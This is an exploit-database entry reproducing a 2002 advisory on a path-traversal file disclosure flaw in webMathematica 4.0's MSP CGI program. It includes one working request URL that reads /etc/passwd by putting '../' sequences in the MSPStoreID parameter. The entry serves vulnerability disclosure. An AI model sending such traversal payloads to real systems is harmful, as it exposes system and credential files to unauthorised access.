Wolfram Research webMathematica 4.0 - File Disclosure

EDB-ID:

21562

CVE:

2002-0926

EDB Verified:

Author:

Andrew Badr

Type:

webapps

Exploit:   /  

Platform:

Java

Date:

2002-06-17

Vulnerable App: 
source: https://www.securityfocus.com/bid/5035/info

Wolfram Research's webMathematica is a Java based product which allows the inclusion of Mathematica content in a web environment. It includes CGI programs which generate image content based on user supplied input.

A file disclosure vulnerability has been reported with the MSP CGI program. A file name parameter supplied by the user is not properly validated. The inclusion of "../" character sequences allows the attacker to escape the web root, and view arbitrary system files.

http://www.domain.com/webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=image/gif
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services